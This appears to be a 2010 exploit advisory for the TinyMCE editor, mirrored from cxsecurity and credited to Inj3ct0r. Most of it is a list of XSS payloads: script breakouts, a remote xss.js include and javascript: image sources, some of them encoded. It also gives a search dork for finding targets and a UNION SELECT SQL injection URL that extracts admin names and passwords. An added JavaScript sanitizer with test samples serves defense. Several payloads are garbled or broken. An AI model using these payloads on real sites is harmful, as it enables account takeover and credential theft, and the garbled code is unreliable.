TinyMCE - Javascript WYSIWYG Editor xss/sql injection vulnerability

CVE Category Price Severity
CWE-79 Not specified High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2010-02-13
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010020037

Below is a copy:

===================================================================
TinyMCE - Javascript WYSIWYG Editor xss/sql injection vulnerability
===================================================================


#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


[+] Vulnerability : *JS tiny_mce/tiny_mce WYSIWYG {JavaScript} vulnerability XSS-->popup
*& SQL implemented
[+] Language : Java--, XML
[+] License : LGPL
[+] Vendor : Moxiecode Systems AB
[+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] vendor : http://tinymce.moxiecode.com/
[+] implemented : Joomla component, Drupal..
[+] dork    :powered:powered by CMS
    :inurl"file_manager.php?type=img"
------------------------------------------------------------------------------------
--[Vulnerability sampling]--
-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------
#alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\";
alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>
#
-------------------------------------------------------------------------------------------------------------------------
#'';!--"<XSS>=&{()}'
------------------------------------------------------------------------------------
<script SRC=http//:server.com/xss.js></put_SCRIPT>
<a hreef="http://www.server://www.server.com/server.com/">put_code</a>
<a href="http://www.server.com./">put_code</a>
<marquee>http://server.net">put_code</marquee>
<a href="//srver.net">put_code</A>
<a href="http://0x1x.01x0061.0x6/">put_code</a>
------------------------------------------------------------------------------------
[Thread img src]

"<img src=javascript:alert(&quot;XSS&quot;)>"
"<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
"<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
"<img src=`javascript:alert("put_xss")`>"
"<IMG SRC="javascript:alert('XSS');">"

<IMG
SRC
=
"
write javascript vertical position example:
j
s
:
a
l
e
r
t
(
'
put code vertical position
'
)
)
;
>

"<IMG SRC=>"

try conversion---->use RainbowText from <IMG SRC=>
make compiling:
<font color="#ff0000">&lt;</font><font color="#ff4200">I</font><font color="#ff8500">M</font><font color="#ffc700">G</font> <font color="#f3ff00">S</font><font color="#b1ff00">R</font><font color="#6eff00">C</font><font color="#2cff00">=</font><font color="#00ff16">&amp;</font><font color="#00ff58">#</font><font color="#00ff9b">1</font><font color="#00ffdd">;</font><font color="#00ddff">&amp;</font><font color="#009bff">#</font><font color="#0058ff">2</font><font color="#0016ff">;</font><font color="#2c00ff">&amp;</font><font color="#6e00ff">#</font><font
color="#b100ff">3</font><font color="#f300ff">;</font><font color="#ff00c7">&amp;</font><font color="#ff0085">#</font><font color="#ff0042">3</font><font color="#ff0000">&gt;</font>
-------------------------------------------------------------------------------------------------------------------------------------------------------------
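
A defensive check for the `<img src>` variants listed above, as an added example that is not part of the original advisory: it decodes character references and strips tab/newline characters the way a browser does before comparing the URL scheme against an allowlist. The function names, the allowlist and the sample inputs are assumptions constructed for illustration.

```javascript
// Added example, not from the advisory; names and sample inputs are constructed.
const NAMED = new Map([['colon', ':'], ['tab', '\t'], ['newline', '\n'], ['amp', '&']]);
const ALLOWED_SCHEMES = new Set(['http', 'https']);

// Step 1: decode HTML character references as the HTML parser does for
// attribute values (numeric forms are accepted without the trailing ';').
function decodeCharRefs(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (name) return NAMED.get(name.toLowerCase()) ?? m;
    const cp = parseInt(hex ?? dec, hex ? 16 : 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : '';
  });
}

// Step 2: apply the URL parser's clean-up, then allowlist the scheme.
function isSafeImgSrc(raw) {
  const v = decodeCharRefs(raw)
    .replace(/[\t\n\r]/g, '')           // tab, LF, CR are removed anywhere
    .replace(/^[\u0000-\u0020]+/, '');  // leading controls and spaces are trimmed
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  if (m) return ALLOWED_SCHEMES.has(m[1].toLowerCase());
  // No scheme: accept only a plain relative path. Empty values, a leading
  // backtick or quote, and protocol-relative "//host" are rejected.
  return /^(?!\/\/)[a-z0-9\/._~-]/i.test(v);
}

// Constructed samples modelled on the [Thread img src] variants.
const SAMPLES = [
  ['images/logo.png', true],
  ['https://example.com/a.png', true],
  ["javascript:alert('XSS')", false],
  ["JaVaScRiPt:alert('XSS')", false],
  ["jav&#x61;script:alert('XSS')", false],                 // hex character reference
  ["&#106&#97&#118&#97script:alert('XSS')", false],        // decimal, no semicolons
  ["j\na\nv\na\ns\nc\nr\ni\np\nt\n:alert('XSS')", false],  // split across lines
  ["`javascript:alert('XSS')`", false],                    // backtick-delimited value
  ['//example.net/x.png', false],
  ['', false],
];

function checkSamples() {
  return SAMPLES.map(([src, want]) => ({ src, want, got: isSafeImgSrc(src) }));
}

for (const r of checkSamples()) {
  console.log(r.got === r.want ? 'ok  ' : 'FAIL', JSON.stringify(r.src), '->', r.got);
}
```

The same check has to run where submitted content is stored or rendered, since filtering done only inside the editor does not see requests posted directly to the server.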

SQL implemented: Injection vulnerability----> installed on c-panel (joomla---sampling write table view/editor)

Exploit :server/patch/index.php?menuID=-value union select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin--




# ~  - [ [ : Inj3ct0r : ] ]

